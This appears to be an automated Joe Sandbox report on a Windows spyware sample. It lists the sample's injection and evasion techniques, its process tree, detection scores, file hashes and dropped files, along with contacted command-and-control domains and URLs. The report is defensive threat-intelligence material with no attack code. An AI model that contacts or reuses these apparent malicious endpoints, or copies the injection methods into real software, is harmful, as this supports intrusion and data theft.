Defense Evasion: Rootkit 1; Virtualization/Sandbox Evasion 3; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 11
Credential Access: Credential API Hooking 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery 131; Virtualization/Sandbox Evasion 3; Process Discovery 2; Remote System Discovery 1; File and Directory Discovery 2; System Information Discovery 13
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Credential API Hooking 1; Archive Collected Data 1; Clipboard Data 1; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 12; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: System Shutdown/Reboot 1; Device Lockout; Delete Device Data

          Behavior Graph

Behavior Graph ID: 433214
Sample: SX365783909782021.bat
Start date: 11/06/2021
Architecture: WINDOWS
Score: 100

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

Process tree recovered from the graph:
SX365783909782021.exe (started)
  dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
  signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  SX365783909782021.exe (started)
    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    explorer.exe (injected)
      DNS/IP: www.djspencer.com 159.89.244.183, 49741, 80 DIGITALOCEAN-ASNUS United States; www.vacalinda.com; 5 other IPs or domains
      signatures: System process connects to network (likely due to code injection or exploit)
      help.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        cmd.exe (started)
          conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
SX365783909782021.exe | 32% | Virustotal | -
SX365783909782021.exe | 39% | ReversingLabs | Win32.Spyware.Noon
SX365783909782021.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll | 0% | Metadefender | -
C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll | 0% | ReversingLabs | -

Unpacked PE Files

Source | Detection | Scanner | Label
0.0.SX365783909782021.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
0.2.SX365783909782021.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
2.2.SX365783909782021.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.help.exe.3b2f834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.0.SX365783909782021.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
2.1.SX365783909782021.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.help.exe.d3d870.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.SX365783909782021.exe.22b0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
ghs.googlehosted.com | 0% | Virustotal | -
caravansforsalenorthwales.com | 0% | Virustotal | -

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.djspencer.com/ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.caravansforsalenorthwales.com/ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 | 0% | Avira URL Cloud | safe
www.moneyhuntercom.info/ngvm/ | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.vacalinda.com/ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.servicesbackyard.com/ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 | 0% | Avira URL Cloud | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
parking.namesilo.com | 168.235.88.209 | true | false | - | high
www.djspencer.com | 159.89.244.183 | true | true | - | unknown
ghs.googlehosted.com | 142.250.180.243 | true | false | - | unknown
caravansforsalenorthwales.com | 34.102.136.180 | true | false | - | unknown
www.vacalinda.com | unknown | unknown | true | - | unknown
www.servicesbackyard.com | unknown | unknown | true | - | unknown
www.caravansforsalenorthwales.com | unknown | unknown | true | - | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.djspencer.com/ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 | true | Avira URL Cloud: safe | unknown
http://www.caravansforsalenorthwales.com/ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 | false | Avira URL Cloud: safe | unknown
www.moneyhuntercom.info/ngvm/ | true | Avira URL Cloud: safe | low
http://www.vacalinda.com/ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 | false | Avira URL Cloud: safe | unknown
http://www.servicesbackyard.com/ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | SX365783909782021.exe | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_Error | SX365783909782021.exe | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                            Contacted IPs

                                            Public

IP                Domain                          Country         ASN     ASN Name             Malicious
142.250.180.243   ghs.googlehosted.com            United States   15169   GOOGLEUS             false
34.102.136.180    caravansforsalenorthwales.com   United States   15169   GOOGLEUS             false
168.235.88.209    parking.namesilo.com            United States   3842    RAMNODEUS            false
159.89.244.183    www.djspencer.com               United States   14061   DIGITALOCEAN-ASNUS   true

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:433214
                                            Start date:11.06.2021
                                            Start time:13:15:17
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 9s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:SX365783909782021.bat (renamed file extension from bat to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/4@4/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 24.5% (good quality ratio 22.4%)
                                            • Quality average: 75.5%
                                            • Quality standard deviation: 30.4%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 40.88.32.150, 52.147.198.201, 184.30.20.56, 20.82.210.154, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.209.104
                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

Match             Associated Sample Name / URL        Detection   Context
168.235.88.209    EDS03932,pdf.exe                    malicious
                  • www.rechnung.pro/hw6d/?mL0XlT=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzWkIOMmg3Jwa27nFeQ==&cBZL=U8td9LP09nG8cn
                  don.exe                             malicious
                  • www.lanren.plus/uoe8/?BR=cjlpd&Y4plXns=tMPs/lCAJOvogVxKb5b8gcWtLLVD4pee8Rndx52EvkMBNrCA1tN1bmbJt/VCVDdzd/qq
                  ZsA5S2nQAa.exe                      malicious
                  • www.alpinevalleytimeshares.com/nsag/?Rx=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVSL8q5zf2v8a&MJBD=FdFtDb28tZBh4rJP
                  SHED.EXE                            malicious
                  • www.servicesguidedata.com/r8pp/?T8Vh=VgA+V9dlqvhFAd2g5YDRlqwEUwSOXLZpnUVCzqpi7uV4yZFrT/qWWoxWPxTalBnvoZjj&-ZPl=1bdpal
                  nova narud#U017eba.exe              malicious
                  • www.computercodecamp.com/fs8/?1b9Tzt1=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2PsdnytLljzoCFBWJoJHXz0sh8CU1Q==&KtkPT=Ab8l7rXHZnC0w2DP
                  New Purchase Order 501,689$.exe     malicious
                  • www.4winner.xyz/eao/?1bB0mR=2eKuYykfKT6E0YrQApY5J4vDJiqOigtFaVbxWGoO7nVxUHKG519x/DeD7eAHpFfAydzY&UPC=yvCdVR2
159.89.244.183    z2xQEFs54b.exe                      malicious

                                              Domains

Match                   Associated Sample Name / URL                      Detection   Context
parking.namesilo.com    tgb4.exe                                          malicious   45.58.190.82
                        5.25.21.exe                                       malicious   70.39.125.244
                        purchase order.doc                                malicious   188.164.131.200
                        Glgcjrikwubeurawzvfntcaqnlnuvkpnql_Signed_.exe    malicious   70.39.125.244
                        000192.xls                                        malicious   198.251.81.30
                        0ccd2703_by_Libranalysis.exe                      malicious   198.251.84.92
                        doc545567799890.exe                               malicious   192.161.187.200
                        EDS03932,pdf.exe                                  malicious   168.235.88.209
                        don.exe                                           malicious   168.235.88.209
                        PO_29_00412.exe                                   malicious   198.251.84.92
                        2sj75tLtYO.exe                                    malicious   192.161.187.200
                        Swift Copy Ref.xlsx                               malicious   192.161.187.200
                        wOPGM5LfSdNOEOp.exe                               malicious   168.235.88.209
                        Proforma Invoice.xlsx                             malicious   204.188.203.155
                        Complete Certificate.exe                          malicious   192.161.187.200
                        eQLPRPErea.exe                                    malicious   64.32.22.102
                        vbc.exe                                           malicious   209.141.38.71
                        Payment Slip.exe                                  malicious   192.161.187.200
                        UTcQK0heAfGWTLw.exe                               malicious   64.32.22.102
                        RFQ # 1014397402856.pdf.exe                       malicious   204.188.203.155

                                              ASN

Match                 Associated Sample Name / URL                                                                       Detection   Context
DIGITALOCEAN-ASNUS    processhacker-2.39-setup.exe                                                                       malicious   162.243.25.33
                      8BDBD0yy0q.apk                                                                                     malicious   167.99.135.134
                      8BDBD0yy0q.apk                                                                                     malicious   167.99.135.134
                      E1a92ARmPw.exe                                                                                     malicious   161.35.179.108
                      crt9O3URua.exe                                                                                     malicious   161.35.179.108
                      E1a92ARmPw.exe                                                                                     malicious   161.35.179.108
                      WcCEh3daIE.xls                                                                                     malicious   157.245.231.228
                      UGGJ4NnzFz.exe                                                                                     malicious   157.245.232.77
                      Proforma Invoice and Bank swift-REG.PI-0086547654.exe                                              malicious   138.197.103.178
                      46113.dll                                                                                          malicious   157.245.231.228
                      46113.dll                                                                                          malicious   157.245.231.228
                      Payment Copy.exe                                                                                   malicious   68.183.229.215
                      teX5sUCWAg.exe                                                                                     malicious   161.35.179.108
                      16X4iz8fTb.exe                                                                                     malicious   139.59.176.201
                      teX5sUCWAg.exe                                                                                     malicious   161.35.179.108
                      P M.exe                                                                                            malicious   138.68.75.3
                      Invoice number FV0062022020.exe                                                                    malicious   68.183.21.244
                      03062021.exe                                                                                       malicious   159.89.241.246
                      85OpNw6eXm.exe                                                                                     malicious   46.101.214.246
                      JJ1PbTh0SP.dll                                                                                     malicious   174.138.22.216
RAMNODEUS             EDS03932,pdf.exe                                                                                   malicious   168.235.88.209
                      seven#U5305#U88dd#U7167#U548c#U7455#U75b5#U7167-#U89e3#U58d3#U7e2e#U5bc6#U78bcm210511.exe          malicious   168.235.72.162
                      wmac.exe                                                                                           malicious   192.184.83.206
                      don.exe                                                                                            malicious   168.235.88.209
                      .x86_64                                                                                            malicious   168.235.95.104
                      .x86_64                                                                                            malicious   168.235.95.104
                      v8iFmF7XPp.dll                                                                                     malicious   168.235.67.138
                      ZsA5S2nQAa.exe                                                                                     malicious   168.235.88.209
                      YpyXT7Tnik.exe                                                                                     malicious   23.226.236.13
                      2ojdmC51As.exe                                                                                     malicious   168.235.67.138
                      0HCan2RjnP.exe                                                                                     malicious   107.161.23.204
                      OZD Payment Information TT784677U.exe                                                              malicious   168.235.93.122
                      OZD Payment Information TT784677U.exe                                                              malicious   168.235.93.122
                      Invoice.exe                                                                                        malicious   168.235.93.122
                      Order-10236587458.exe                                                                              malicious   168.235.93.122
                      Purchase Order22420.exe                                                                            malicious   168.235.93.122
                      Concentracion de pedidos_PO.exe                                                                    malicious   168.235.93.122
                      P_Order Flex Saneh.exe                                                                             malicious   168.235.93.122
                      Purchase Order list.exe                                                                            malicious   168.235.93.122
                      rfq02212021.exe                                                                                    malicious   168.235.93.122

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

Match                                                      Associated Sample Name / URL                                         Detection
C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll    moq fob order.exe                                                    malicious
                                                           0900000000000090000.exe                                              malicious
                                                           444890321.exe                                                        malicious
                                                           Packing-List_00930039.exe                                            malicious
                                                           2435.exe                                                             malicious
                                                           INVOICE.exe                                                          malicious
                                                           Shipment Invoice & Consignment Notification.exe                      malicious
                                                           KY4cmAI0jU.exe                                                       malicious
                                                           5t2CmTUhKc.exe                                                       malicious
                                                           8qdfmqz1PN.exe                                                       malicious
                                                           New Order PO2193570O1.doc                                            malicious
                                                           L2.xlsx                                                              malicious
                                                           Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx     malicious
                                                           New Order PO2193570O1.pdf.exe                                        malicious
                                                           2320900000000.exe                                                    malicious
                                                           CshpH9OSkc.exe                                                       malicious
                                                           5SXTKXCnqS.exe                                                       malicious
                                                           i6xFULh8J5.exe                                                       malicious
                                                           AWB00028487364 -000487449287.doc                                     malicious
                                                           090049000009000.exe                                                  malicious

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\lsemennd
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):56673
                                                                                      Entropy (8bit):4.970773930948534
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:R20gYxZ/Kg7zfrOHzHyyukuUKFvL4D04U7YYRiFiswp:o05Z/Kg7HOHzKY0wYRiS
                                                                                      MD5:F95B23E6289D1281F61129ED8AC17124
                                                                                      SHA1:AB0A3D90CAC7E7B8A9E9856FB0E24F4B93498E0D
                                                                                      SHA-256:7DD01877C1A940E1D6E761AB769370B2CAF2BA2CC967082D7B12328E837518A8
                                                                                      SHA-512:9FDA413CE2E868B4F1BF8DFC4C65838525B22C892B18B52F591AAF1BF21C59E4FC73A7ADA8A5D22002ECF0AD2576AB0DD2C6FC6C3EBD2B4BEFBA1D4A547D3C56
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: U......#....D.....E.....F.....G...o.H...o.I.....J.....K...k.L.....M...-.N...s.O...o.P.....Q.....R...k.S.....T...k.U.....V...z.W...o.X...o.Y.....Z.....[.....\...o.]...:.^....._...G.`.....a...o.b...o.c...o.d.....e.....f.....g.....h.....i.....j.....k.....l...G.m...o.n.....o.....p.....q.....r.....s...1.t...o.u...o.v.....w.....x.....y.....z.....{.....|.....}.....~.........G.......................G.................:.........../...........o.....o.....o.................O...................................3................./.....o.............................3.....1.....o.....o.................3.......................3................./......................./.................:...........7...........o.....o.....o.......................................................................7.....o...................................1.....o.....o..................
                                                                                      C:\Users\user\AppData\Local\Temp\nsvDA2C.tmp
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):276728
                                                                                      Entropy (8bit):7.477737961289009
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:w4YziQaUsVYAcvdY0yX/wcV0LbATJj92DkHUKY0kt:zYziQqVYVY0gwW04GSUKYN
                                                                                      MD5:913EAD302DB3A2438A73EA361174257A
                                                                                      SHA1:847631998D6B838A753B3794DFD9C7337CF9A9D0
                                                                                      SHA-256:D965EBAD5B2092374EF6C88CCE8E045DD0715A4BB45A59A8090232B034B21E3F
                                                                                      SHA-512:6F607C7327037E1F3F4DD476358A4387A34F4AE383D71DF15D9C4D861946FBF263E9E51EABEE92699CBB4ED86C76E7F62FF4AF470342178E3E5C78DA02F352CE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: .S......,.......................p=.......R......oS..........................................................................................................................................................................................................................................J...............!...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):5.855045165595541
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                      MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                      SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                      SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                      SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                      Malicious:false
                                                                                      Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
• Filename: moq fob order.exe, Detection: malicious
• Filename: 0900000000000090000.exe, Detection: malicious
• Filename: 444890321.exe, Detection: malicious
• Filename: Packing-List_00930039.exe, Detection: malicious
• Filename: 2435.exe, Detection: malicious
• Filename: INVOICE.exe, Detection: malicious
• Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious
• Filename: KY4cmAI0jU.exe, Detection: malicious
• Filename: 5t2CmTUhKc.exe, Detection: malicious
• Filename: 8qdfmqz1PN.exe, Detection: malicious
• Filename: New Order PO2193570O1.doc, Detection: malicious
• Filename: L2.xlsx, Detection: malicious
• Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious
• Filename: New Order PO2193570O1.pdf.exe, Detection: malicious
• Filename: 2320900000000.exe, Detection: malicious
• Filename: CshpH9OSkc.exe, Detection: malicious
• Filename: 5SXTKXCnqS.exe, Detection: malicious
• Filename: i6xFULh8J5.exe, Detection: malicious
• Filename: AWB00028487364 -000487449287.doc, Detection: malicious
• Filename: 090049000009000.exe, Detection: malicious
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\ymhuzov3o2q1at
Process: C:\Users\user\Desktop\SX365783909782021.exe
File Type: data
Category: dropped
Size (bytes): 186880
Entropy (8bit): 7.999097081713126
Encrypted: true
SSDEEP: 3072:xgst4EziQaY9ga+VYAcv3aGY0yXRsCz5ufmwytkQVPKLYkA2w7v0Ud9HIcZ2a:WYziQaUsVYAcvdY0yX/wcV0LbATJj92a
MD5: 0A8021CB1A87799447CAE887D90E22BB
SHA1: D775275C6ECF3EE1FF9FECAF5830ED1E256D3E10
SHA-256: 751DEE316732301CE8CD9AFBE4565814E3527D6B5E902AB3A43765915E812B36
SHA-512: EC5237A86866D9A2ABA7056B3DEA65278C4B7D527DEE4EBFD6BE07314144F9044D44F79CEE238A6C7D2750EA2C70C23A709BA876C28E36FC10AFA20A9F7340E6
Malicious: false
Reputation: low
                                                                                      Preview: ./b.\\.c.u.m.$....M.r.\..[.G..%.....T....iW...R.G...#..k.0...C.q*.c.#.R..9.C.s.....f...r..*y.O...".....j..,e.}>Z..%......S...k..`.#......G2..^..r.'...RLS.MAmZMR..F.;3A.8..#P..^m..5.I+....>>...<.sUb.......X..b..r;..8X4?:P...t..H..._..A&x.c...r./.oz{._j.&:.h..<.n.Y7.i*./yD..K..I../UN....h..Z@.h+......@.....(.B>h..v...-.Cm.5y.A.U..$..Q.R.hA.j..4....c.M......h..9m.....e.Z...L.t@.........>(.....&..-2?j..S>.ZJ.9c..E...(.i..X......x.:....0...........v.C.F.\..#CQ.......id.L.z.#..........y%...:..Z.z.|..l..=..o....6.:...1F...w)..(z.-.....:Iy......{...YYC..R.S.m........n..j.x.["8P..r....#/......[.e".4&.'<s.,.(`1.nr|\.C...D.I..">..6.0.!..*r.......Ja..p.h".&8)hc.b.U=87.y.$@...G~.)gj..)........>.yH..c.j..m..../.Py...v@.....1..&...c,B*?..L9..;.....C.$W.|."_...},.f..d..q...[......@.{.yF..u.._...,........Z.Zj........C...$@..d.P.6...x.X.8....&C.........Ry$....c.'.......q..e..ZKy.eH...y`.y..]/..z.\....q..`R.7...t.<.<Y..0Q.ja.m.t.,.......@.^...

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.925274027835951
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SX365783909782021.exe
File size: 245880
MD5: ee1f4a07b874aa6ba18d6aa0f83252d3
SHA1: d17b97dc47707b685bc8976d3cbc6cdbfbd5fcee
SHA256: d66268222a39fd97e792983a3bacdb1e81067b7a28848a87fe65a5dc91f7e82a
SHA512: a9dad5dc2c70277d972b184a6177e07316f2e286b6597597f5d0a5095e3716d599b08dd8ca9339019bba48f847af90b68de0a06b1c947645d22eeddd1d41aab6
SSDEEP: 6144:Ds9u96cRH4eb7DCIKDDsd5iCRFX7yYjjqe1/w:yprebPlWDmDFL5lI
